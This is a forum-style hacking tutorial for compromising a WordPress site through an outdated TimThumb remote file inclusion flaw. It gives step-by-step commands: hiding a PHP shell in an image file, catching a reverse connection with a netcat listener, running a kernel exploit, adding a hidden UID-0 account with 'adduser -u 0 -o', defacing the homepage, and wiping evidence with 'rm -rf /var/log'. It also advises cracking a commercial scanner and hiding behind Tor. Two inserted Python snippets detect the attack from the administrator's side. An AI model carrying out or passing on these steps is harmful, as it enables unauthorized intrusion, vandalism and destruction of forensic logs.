Hacking A Website VIA RFI

Tools Required:

Backtrack/Kali
– Backtrack/Kali is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking from a Linux system is better than from a Windows one, since most websites are on Linux servers.
(Just a little tip: to wirelessly connect to a network use the Wicd Network Manager, located under Applications->Internet)

Firefox
– Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons, among which you can find some for hacking. Find more about "hacky" add-ons for Firefox Here....

Netcat
– Netcat is a powerful networking tool. You will need this to root the server....

iCon2PHP & Good Shells
– iCon2PHP is a tool I created and you will use it if you upload the image to an image uploader at a forum or image hosting service. The iCon2PHP archive contains some of the top shells available.

Good VPN or Tor (proxies are good too...)
– While hacking you need to be anonymous so that nobody can find you (even if you forget to delete the logs...). VPN stands for Virtual Private Network and what it does is hide your IP and encrypt the data you send to and receive from the Internet. A good VPN solution for Windows machines is ProXPN. However, with VPN connections (especially free VPN connections) your connection speed is really slow. So, I wouldn't recommend a VPN unless you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle, Vidalia, which is a great tool for Windows, Mac and Linux that uses proxies all over its network around the world to keep you anonymous, changing these proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don't want to pay for a paid VPN account.
Apart from Tor, simple proxies are good, but I wouldn't recommend them as much as I would Tor.
— If I listed the above options according to their reliability:
1. Paid VPN account at ProXPN
2. Tor
3. Free VPN account at ProXPN
4. Proxy connection

Acunetix Web Vulnerability Scanner
– Acunetix is (maybe) the best vulnerability scanner. It scans for open ports, vulnerabilities and directory listing. During the scan it lists the vulnerabilities, says how a hacker can exploit each one and how to patch it, and also shows whether it is a small or a big vulnerability. The Consultant Edition (for unlimited websites) costs about 3000-7000$.
______________________________________________
Starting the Main Tutorial:
So, here is the route we will follow:
Find a Vulnerable Website -> Upload a c100 Shell (hidden in an image with iCon2PHP) -> Rooting the Server -> Defacing the Website -> Covering your Tracks
--- Before we begin ---
-Boot to Backtrack/Kali Linux
-Connect to your VPN or to Tor.
-Open Firefox.
1. Finding a Vulnerable Website and Information about it:
Crack Acunetix (find a tutorial at Hackforums.net). Open it and scan the website (use the standard profile; don't modify anything unless you know what you are doing). For this tutorial our website will be: http://www.website.com (not very innovative, I know....)
Let's say we find a vulnerability where we can upload a remote file (our shell) and get access to the website's files.
The warning should be something like this. It can mention other information or be a completely different warning (like for SQL injection; I will post a tutorial on this also...), depending on the vulnerability. What we need for this tutorial is that we can exploit the 'File Inclusion Attack' and have access to the website's files. (This is not the warning we need for this tutorial, but it is related to what we do too.)
OK. Now we have the site and the path where the vulnerability is. In our example let's say it is here:
http://www.website.com/wp-content/themes/theme_name/thumb.php
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven't updated to the latest version of TimThumb, which is an image-editing service used on websites.
OK. Acunetix should also mention the OS of the server. We assume that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don't need anything more from Acunetix.
2. Uploading the shell:
Till now, we know:
-The website's blog has a huge vulnerability at TimThumb.
-It is hosted on a Unix system.
Next, because the vulnerability is located in an outdated TimThumb version, and TimThumb is a service to edit images, we need to upload the shell instead of an image. Thus, download any image (I would recommend a small one) from Google Images. We don't care what it shows.
Generate Output with iCon2PHP
Copy your image and your shell to the folder where iCon2PHP is located. Run the program and follow the in-program instructions to build 'finalImage.php'.
To avoid any errors while uploading, rename 'finalImage.php' to 'image.php;.png' (instead of png, type the image format your image was: jpeg, jpg, gif....). This is exactly the same file, but it confuses the uploader into thinking that it actually is an image.
iCon2PHP Terminal Output:
[...]
Enter the Path of your Image: image.png
Please enter the path to the PHP: AnonKnw.php
Entered!
Valid Files!
[...]
File: 'finalImage.php' has been successfully created at the Current Directory...
Upload Output to a Server:
Next, upload your 'image.php;.png' to a free server (000webhost, 0fees etc....).
Go to the vulnerability and type at the URL:
http://www.website.com/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like "flickr.com" (or another big image-hosting service) because sometimes it doesn't accept images from other websites.
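An added example from the administrator's side (not the tutorial's own code and not TimThumb's): the substring-style host check that the "flickr.com" subdomain trick slips past, next to a strict check, run over constructed Apache access-log lines so that such requests can be spotted. The allow-list, the log lines and the attacker domain are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Hosts the site actually wants thumb.php to fetch images from (assumed allow-list).
ALLOWED_HOSTS = ("flickr.com", "picasa.com", "img.youtube.com")

def weak_host_check(host):
    """Substring match: the kind of check 'flickr.com.<attacker-domain>' slips past."""
    return any(allowed in host for allowed in ALLOWED_HOSTS)

def strict_host_check(host):
    """Hardened form: the host must equal an allowed host or be a subdomain of it."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)

def src_host(request_path):
    """Host named in a thumb.php/timthumb.php src= parameter, or None."""
    parts = urlsplit(request_path)
    if not parts.path.endswith(("thumb.php", "timthumb.php")):
        return None
    for pair in parts.query.split("&"):
        if pair.startswith("src="):
            return urlsplit(unquote(pair[4:])).hostname
    return None

# Common Log Format; only the client IP and the request path are needed here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*"')

def suspicious_requests(log_lines):
    """(ip, host) pairs where the weak check accepts the src host but the strict one rejects it."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        host = src_host(m.group("path")) if m else None
        if host and weak_host_check(host) and not strict_host_check(host):
            hits.append((m.group("ip"), host))
    return hits

# Constructed sample access-log lines (not from any real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2013:08:11:02 +0000] "GET /wp-content/themes/theme_name/thumb.php?src=http://flickr.com.attacker.example/image.php;.png HTTP/1.1" 200 1337',
    '198.51.100.4 - - [10/Oct/2013:08:12:51 +0000] "GET /wp-content/themes/theme_name/thumb.php?src=http://farm1.static.flickr.com/photo.jpg HTTP/1.1" 200 4411',
    '192.0.2.9 - - [10/Oct/2013:08:13:10 +0000] "GET /index.php HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, host in suspicious_requests(SAMPLE_LOG):
        print(f"RFI attempt from {ip}: src host {host} is not under an allowed domain")
```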
Website.... Shelled!
OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now, but it would be better if you first rooted the server, so as to cover your tracks quickly.
3. Root the Server:
Now that you have shelled your website we can start the process of rooting the server.
What is rooting when it comes to server hacking?
--> Rooting a server is the procedure by which the hacker acquires root privileges on the whole server. If you don't understand this yet, I reassure you that by the end of the section "Rooting a server" you will have understood exactly what it is...
Let's proceed to rooting....
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems....)
2. Open Terminal.
3. Type:
netcat -l -n -v -p 402
4. Hit Enter.
5. It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at the shell.
7. Complete with the following:
Host: YourIPAddress Port: 402 (or the port you forwarded....)
8. Hit connect and... Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet...
2. To do so we have to download a kernel exploit. The kernel version is mentioned in your shell. Find kernel exploits from Google and other sources.
3. Download it to your HDD and then upload it to the server via the shell. Unzip first, if zipped....
4. Now do the following exploit preparations:
– The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(If the program is in C you first have to compile it by typing: gcc exploit.c -o exploit)
– Change the permissions of the exploit:
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to make sure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!
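An added example from the defender's side, not part of the tutorial: a check for the extra UID-0 account that step 7 creates, read both from /etc/passwd and from the useradd entries in auth.log, so an administrator can catch it even after the password has been set. The passwd and log contents below are constructed samples; the hostname and PIDs are assumptions.

```python
import re

# Shape of the syslog line shadow-utils' useradd writes when an account is created.
USERADD_RE = re.compile(r"useradd\[\d+\]: new user: name=(?P<name>[^,]+), UID=(?P<uid>\d+)")

def extra_uid0_accounts(passwd_text):
    """Usernames other than 'root' whose UID field in /etc/passwd is 0."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found

def uid0_creations(auth_log_text):
    """Usernames that useradd logged as created with UID 0 (what 'adduser -u 0 -o' produces)."""
    return [m.group("name") for m in USERADD_RE.finditer(auth_log_text) if m.group("uid") == "0"]

def audit(passwd_text, auth_log_text):
    """Union of both signals: the accounts worth investigating first."""
    return sorted(set(extra_uid0_accounts(passwd_text)) | set(uid0_creations(auth_log_text)))

# Constructed sample /etc/passwd (not from any real host).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
root1:x:0:0::/home/root1:/bin/bash
"""

# Constructed sample auth.log excerpt (not from any real host).
SAMPLE_AUTH_LOG = """Oct 10 08:11:02 web01 useradd[4021]: new user: name=root1, UID=0, GID=0, home=/home/root1, shell=/bin/bash
Oct 10 08:11:40 web01 passwd[4030]: pam_unix(passwd:chauthtok): password changed for root1
Oct 10 09:00:00 web01 useradd[4100]: new user: name=deploy, UID=1001, GID=1001, home=/home/deploy, shell=/bin/bash
"""

if __name__ == "__main__":
    print("suspect UID-0 accounts:", audit(SAMPLE_PASSWD, SAMPLE_AUTH_LOG))
```

Running the passwd check on the live file is a one-liner (`audit(open("/etc/passwd").read(), open("/var/log/auth.log").read())`); the log check only helps while the log still exists, which is exactly why the tutorial's last section deletes it.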
4. Deface the Website:
What is defacing?
Defacing is the procedure by which the hacker uploads his own index webpage to replace the homepage of a site. In this way he can boost his reputation or pass a message to the people or the company (which owns the website...).
Since you got the website shelled, you just create a nice hacky page in HTML and upload it via the shell as index.html (delete or rename the website's own one...).
5. Cover your tracks:
Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you, we have to delete logs.
First of all, Unix-based machines have some logs that you had better either edit or delete.
Common Linux log file names and their usage:
/var/log/messages: general messages and system related stuff
/var/log/auth.log: authentication logs
/var/log/kern.log: kernel logs
/var/log/cron.log: crond logs (cron jobs)
/var/log/maillog: mail server logs
/var/log/qmail/: qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd/: lighttpd access and error logs directory
/var/log/boot.log: system boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: authentication log
/var/log/utmp or /var/log/wtmp: login records file
/var/log/yum.log: yum log files
In short, /var/log is the location where you should find all Linux log files.
To delete all of them at once type:
su root1
rm -rf /var/log
mkdir /var/log
End of this Tutorial:

Thanx For Reading!!!!